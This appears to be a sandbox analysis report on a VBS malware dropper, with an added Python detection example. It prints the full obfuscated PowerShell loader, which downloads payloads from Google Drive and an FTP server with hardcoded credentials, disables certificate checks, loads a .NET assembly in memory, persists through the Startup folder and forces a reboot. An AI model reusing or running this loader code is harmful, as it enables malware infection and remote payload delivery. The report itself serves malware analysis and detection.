Analysis

max time kernel: 119s
max time network: 134s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 09-11-2024 03:31

Static task: static1
Behavioral task: behavioral1
  Sample: bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs
  Resource: win10v2004-20241007-en
General

Target: bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs
Size: 165KB
MD5: 34f854905f0f1cfb29f41736b34c84d2
SHA1: 777d4629fd82935f3760168cc95cd12a69701425
SHA256: bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933
SHA512: 5a671989c7924466b249a5fe0d75667e820bb75d82fcd6e613211cb721b41eb7f2f84c8ffbb5df4fd08277c3e9350714dd9764a7cc5f65286b51807e11cb97dd
SSDEEP: 3072:V0Z0Z0Z0Z0Z0Z0Z0Z0Z06K0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0p:q

Malware Config

Extracted: https://drive.google.com/uc?export=download&id=
(Base URL only. The stage-2 script in PID 2800 appends one of two Google Drive file ids depending on whether PROCESSOR_ARCHITECTURE contains "64".)
Signatures

Blocklisted process makes network request (2 IoCs)
  flow 5, pid 2800, powershell.exe
  flow 7, pid 2800, powershell.exe

Command and Scripting Interpreter: PowerShell (3 IoCs; heading recovered from the per-process tags in the Processes section)
  pid 2800, powershell.exe
  pid 2192, powershell.exe
  pid 2344, powershell.exe

Drops startup file (2 IoCs)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs (powershell.exe)
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs (powershell.exe)

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 4: drive.google.com
  flow 5: drive.google.com

Drops file in Windows directory (3 IoCs)
  File created: C:\Windows\wusa.lock (wusa.exe)
  File opened for modification: C:\Windows\Logs\DPX\setupact.log (wusa.exe)
  File opened for modification: C:\Windows\Logs\DPX\setuperr.log (wusa.exe)

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid 2344, 2800, 2536, 2192 (all powershell.exe)

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege in pid 2344, 2800, 2536, 2192 (all powershell.exe)

Suspicious use of WriteProcessMemory (15 IoCs: five distinct parent/child pairs, each logged three times)
  description                        pid   Process         procid_target
  PID 2948 wrote to memory of 2344   2948  WScript.exe     31
  PID 2344 wrote to memory of 2800   2344  powershell.exe  33
  PID 2800 wrote to memory of 2536   2800  powershell.exe  34
  PID 2536 wrote to memory of 3024   2536  powershell.exe  35
  PID 2800 wrote to memory of 2192   2800  powershell.exe  36
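Worked example (added here; not part of the Triage report): the WriteProcessMemory rows above, de-duplicated and turned back into a parent/child tree, with a simple detection rule run over the result. In this run every (parent, child) pair in that table coincides with a spawn shown in the Processes section, so the rows alone are enough to reconstruct the chain WScript.exe -> powershell.exe -> powershell.exe -> {powershell.exe -> wusa.exe, powershell.exe}. The row text is copied from the report; the leaf image names (taken from the Processes section) and the SCRIPT_HOSTS list are assumptions this example adds.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Added example, not part of the Triage report: rebuild the process chain from
# the "Suspicious use of WriteProcessMemory" rows and flag the
# script-host -> PowerShell pattern.

# Constructed input: the report's rows, one per line. Triage logs each write
# three times; the parser keeps one edge per (parent, child) pair.
WPM_ROWS = """\
PID 2948 wrote to memory of 2344 2948 WScript.exe 31
PID 2948 wrote to memory of 2344 2948 WScript.exe 31
PID 2948 wrote to memory of 2344 2948 WScript.exe 31
PID 2344 wrote to memory of 2800 2344 powershell.exe 33
PID 2344 wrote to memory of 2800 2344 powershell.exe 33
PID 2344 wrote to memory of 2800 2344 powershell.exe 33
PID 2800 wrote to memory of 2536 2800 powershell.exe 34
PID 2800 wrote to memory of 2536 2800 powershell.exe 34
PID 2800 wrote to memory of 2536 2800 powershell.exe 34
PID 2536 wrote to memory of 3024 2536 powershell.exe 35
PID 2536 wrote to memory of 3024 2536 powershell.exe 35
PID 2536 wrote to memory of 3024 2536 powershell.exe 35
PID 2800 wrote to memory of 2192 2800 powershell.exe 36
PID 2800 wrote to memory of 2192 2800 powershell.exe 36
PID 2800 wrote to memory of 2192 2800 powershell.exe 36
"""

# Leaf processes never appear as a writer, so their image names are not in the
# rows; these two come from the Processes section of the report (assumption).
LEAF_IMAGES = {3024: "wusa.exe", 2192: "powershell.exe"}

# Script hosts whose child PowerShell we want to flag (assumption, not from the report).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

_ROW = re.compile(r"PID (\d+) wrote to memory of (\d+) \d+ (\S+) \d+")


def parse_rows(rows: str) -> Tuple[List[Tuple[int, int]], Dict[int, str]]:
    """Unique (parent, child) edges in first-seen order, plus writer image names."""
    edges, names = [], {}
    for m in _ROW.finditer(rows):
        parent, child, image = int(m.group(1)), int(m.group(2)), m.group(3)
        names[parent] = image
        if (parent, child) not in edges:
            edges.append((parent, child))
    return edges, names


def chains(edges: List[Tuple[int, int]]) -> List[List[int]]:
    """Every root-to-leaf PID path, depth-first, children in first-seen order."""
    children = defaultdict(list)
    for parent, child in edges:
        children[parent].append(child)
    child_set = {child for _, child in edges}
    roots = [p for p in dict.fromkeys(parent for parent, _ in edges) if p not in child_set]
    paths: List[List[int]] = []

    def walk(pid: int, path: List[int]) -> None:
        path = path + [pid]
        if pid not in children:          # no recorded children: a leaf
            paths.append(path)
        for child in children.get(pid, []):
            walk(child, path)

    for root in roots:
        walk(root, [])
    return paths


def flag_script_host_to_powershell(rows: str, leaf_images: Dict[int, str]) -> List[List[str]]:
    """Paths in which a script host is followed, at any depth, by powershell.exe."""
    edges, names = parse_rows(rows)
    names = {**leaf_images, **names}     # row-derived names win over the leaf table
    hits = []
    for path in chains(edges):
        images = [names.get(pid, "?") for pid in path]
        lowered = [i.lower() for i in images]
        if any(h in SCRIPT_HOSTS and "powershell.exe" in lowered[i + 1:]
               for i, h in enumerate(lowered)):
            hits.append(images)
    return hits


if __name__ == "__main__":
    for hit in flag_script_host_to_powershell(WPM_ROWS, LEAF_IMAGES):
        print(" -> ".join(hit))
```

Both root-to-leaf paths in this run are flagged; the rule is deliberately loose (any PowerShell below a script host), which is the right trade-off for a hunting query over endpoint telemetry where the parent/child relationship is the most stable signal and the command line is obfuscated.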
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fvgwr = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAG0Acw' + [char]66 + '' + [char]66 + 'AGcAZQ' + [char]66 + 'SAEQARA' + [char]66 + 'EACcAIAAsACAATQ' + [char]66 + 'vAHcATg' + [char]66 + 'zACQAIAAsACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AcA' + [char]66 + 'hAHMAdA' + [char]66 + 'lAC4AZQ' + [char]66 + 'lAC8AZAAvADEAMw' + [char]66 + 'QAHYAeQAvADAAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAbQ' + [char]66 + 'HAHEAaQ' + [char]66 + 'uACQAIAAoAGQAbw' + [char]66 + 'oAHQAZQ' + [char]66 + 'NAHQAZQ' + [char]66 + 'HAC4AKQAgAEUAZg' + [char]66 + 'YAHMAZwAkACAAKwAgAEcAaQ' + [char]66 + 'UAHoASgAkACAAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAPQAgAG0ARw' + [char]66 + 'xAGkAbgAkADsAJwAxAHMAcw' + [char]66 + 'hAGwAQwAnACAAPQAgAEUAZg' + [char]66 + 'YAHMAZwAkADsAJwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAgAD0AIA' + [char]66 + 'HAGkAVA' + [char]66 + '6AEoAJAA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkADsAKQAgACkAJw' + [char]66 + '' + [char]66 + 'ACcALAAnAJMhOgCTIScAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'yAC4AcQ' + [char]66 + '2AHoAZA' + [char]66 + '5ACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' 
+ [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'zAFsAIAA9ACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAgACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAUQ' + [char]66 + 'HAHAAZQ' + [char]66 + 'JACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAKAAgAD0AIA' + [char]66 + 'xAHYAeg' + [char]66 + 'kAHkAJAA7ACAAIA' + [char]66 + '9ACAAZw' + [char]66 + 'uAGkAcw' + [char]66 + 'yAGEAUA' + [char]66 + 'jAGkAcw' + [char]66 + 'hAEIAZQ' + [char]66 + 'zAFUALQAgAFEARw' + [char]66 + 'wAGUASQAkACAAZQ' + [char]66 + 'sAGkARg' + [char]66 + '0AHUATwAtACAAaw' + [char]66 + 'qAHoAaw' + [char]66 + '6ACQAIA' + [char]66 + 'JAFIAVQAtACAAdA' + [char]66 + 'zAGUAdQ' + [char]66 + 'xAGUAUg' + [char]66 + 'iAGUAVwAtAGUAaw' + [char]66 + 'vAHYAbg' + [char]66 + 'JADsAIAApACAAUQ' + [char]66 + 'HAHAAZQ' + [char]66 + 'JACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgAGsAag' + [char]66 + '6AGsAegAkADsAIAApACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACgAIAA9ACAAUQ' + [char]66 + 'HAHAAZQ' + [char]66 + 'JACQAewAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAMQAuADAALgAwAC4ANwAyADEAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'wADsAIA' + [char]66 + 'jAC8AIA' + [char]66 + 'lAHgAZQAuAGQAbQ' + [char]66 + 'jADsAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAYwAkACAAbA' + [char]66 + 'hAGkAdA' + [char]66 + 
'uAGUAZA' + [char]66 + 'lAHIAQwAtACAAZw' + [char]66 + 'uAGkAcw' + [char]66 + 'yAGEAUA' + [char]66 + 'jAGkAcw' + [char]66 + 'hAEIAZQ' + [char]66 + 'zAFUALQAgAFEARw' + [char]66 + 'wAGUASQAkACAAZQ' + [char]66 + 'sAGkARg' + [char]66 + '0AHUATwAtACAAcg' + [char]66 + '2AHMAYg' + [char]66 + 'mACQAIA' + [char]66 + 'JAFIAVQAtACAAdA' + [char]66 + 'zAGUAdQ' + [char]66 + 'xAGUAUg' + [char]66 + 'iAGUAVwAtAGUAaw' + [char]66 + 'vAHYAbg' + [char]66 + 'JADsAKQApACkAKQApACAANAA2ACwANAA2ACwANgA1ACwANQA1ACwAMwA1ACwAOQA0ACwAOQA4ACwANwA3ACwANgA2ACwANQA4ACwAIAA3ADkALAAgADEAMgAxACwAIAAxADcAIAAsADkAMQAxACAALAAwADcAIAAsADYANgAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMALQAgAGUAYw' + [char]66 + 'yAG8ARgAtACAAdA' + [char]66 + '4AGUAVA' + [char]66 + 'uAGkAYQ' + [char]66 + 'sAFAAcw' + [char]66 + '' + [char]66 + 'AC0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'lAHIAdQ' + [char]66 + 'jAGUAUwAtAG8AVA' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DACgAIAAsACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'TAFAAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAYwAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAUQ' + [char]66 + 'HAHAAZQ' + [char]66 + 'JACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 
'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + 'yAHYAcw' + [char]66 + 'iAGYAJAA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 
'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAGYARA' + [char]66 + 'ZAGMAbQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAcg' + [char]66 + '2AG4ARw' + [char]66 + 'vACQAKAAgAD0AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAGYARA' + [char]66 + 'ZAGMAbQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAcg' + [char]66 + '2AG4ARw' + [char]66 + 'vACQAKAAgACwAaA' + [char]66 + 'zAHcAdA' + [char]66 + 'tACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAG4AbQ' + [char]66 + 'nAHYAcAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + 
[char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'uAG0AZw' + [char]66 + '2AHAAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'uAG0AZw' + [char]66 + '2AHAAJAA7AH0AOwAgACkAJw' + [char]66 + '0AE8ATA' + [char]66 + 'jAF8ASw' + [char]66 + 'hADMAWg' + [char]66 + 'mAG8AWAAyAEoASg' + [char]66 + 'yAFYAaA' + [char]66 + 'tAFYAOQ' + [char]66 + 'jAG0AOQ' + [char]66 + 'YAHMAdQ' + [char]66 + 'YAG0AagAxAGcAMQAnACAAKwAgAGgAcw' + [char]66 + '3AHQAbQAkACgAIAA9ACAAaA' + [char]66 + 'zAHcAdA' + [char]66 + 'tACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnADIANA' + [char]66 + '1AFgASg' + [char]66 + 'UAHEAYQ' + [char]66 + 'tAGcAeQ' + [char]66 + 'NAHQARg' + [char]66 + '6AGEAaw' + [char]66 + 'QAFIAMQ' + [char]66 + 'xAF8ASQ' + [char]66 + '2AEcAaQ' + [char]66 + 'YAE4AZA' + [char]66 + 'xAGEATgAxACcAIAArACAAaA' + [char]66 + 'zAHcAdA' + [char]66 + 'tACQAKAAgAD0AIA' + [char]66 + 'oAHMAdw' + [char]66 + '0AG0AJA' + [char]66 + '7ACAAKQAgAGwAZQ' + [char]66 + '6AGYARgAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAbA' + [char]66 + 'lAHoAZg' + [char]66 + 'GACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAGgAcw' + [char]66 + '3AHQAbQAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 
'wAFUAXAAnACAAKwAgAHIAdg' + [char]66 + 'uAEcAbwAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'yAHYAbg' + [char]66 + 'HAG8AJA' + [char]66 + '7ACAAKQAgAEcAdQ' + [char]66 + 'PAEYAUgAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEcAdQ' + [char]66 + 'PAEYAUgAkACAAOwA=';$fvgwr = $fvgwr.replace('уЦϚ' , 'B') ;;$ykcxg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $fvgwr ) ); $ykcxg = $ykcxg[-1..-$ykcxg.Length] -join '';$ykcxg = $ykcxg.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs');powershell $ykcxg2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $RFOuG = $host.Version.Major.Equals(2) ;if ( $RFOuG ) {$oGnvr = [System.IO.Path]::GetTempPath();del ( $oGnvr + '\Upwin.msu' );$mtwsh = 'https://drive.google.com/uc?export=download&id=';$Ffzel = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Ffzel ) {$mtwsh = ($mtwsh + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$mtwsh = ($mtwsh + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$pvgmn = (New-Object Net.WebClient);$pvgmn.Encoding = [System.Text.Encoding]::UTF8;$pvgmn.DownloadFile($mtwsh, ($oGnvr + '\Upwin.msu') );$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($oGnvr + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$fbsvr = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )))));Invoke-WebRequest -URI $fbsvr -OutFile $IepGQ -UseBasicParsing -Credential $credential;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$IepGQ = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$zkzjk = ( Get-Content -Path $IepGQ ) ;Invoke-WebRequest -URI $zkzjk -OutFile $IepGQ -UseBasicParsing } ;$ydzvq = (Get-Content -Path $IepGQ -Encoding UTF8) ;[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( 
$ydzvq.replace('↓:↓','A') );$sNwoM = 'C:\Users\Admin\AppData\Local\Temp\bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs';$JzTiG = 'ClassLibrary3.';$gsXfE = 'Class1';$niqGm = 'prFVI';[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).GetType( $JzTiG + $gsXfE ).GetMethod( $niqGm ).Invoke( $null , [object[]] ( '0/yvP31/d/ee.etsap//:sptth' , $sNwoM , 'DDDRegAsm' ) );};"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
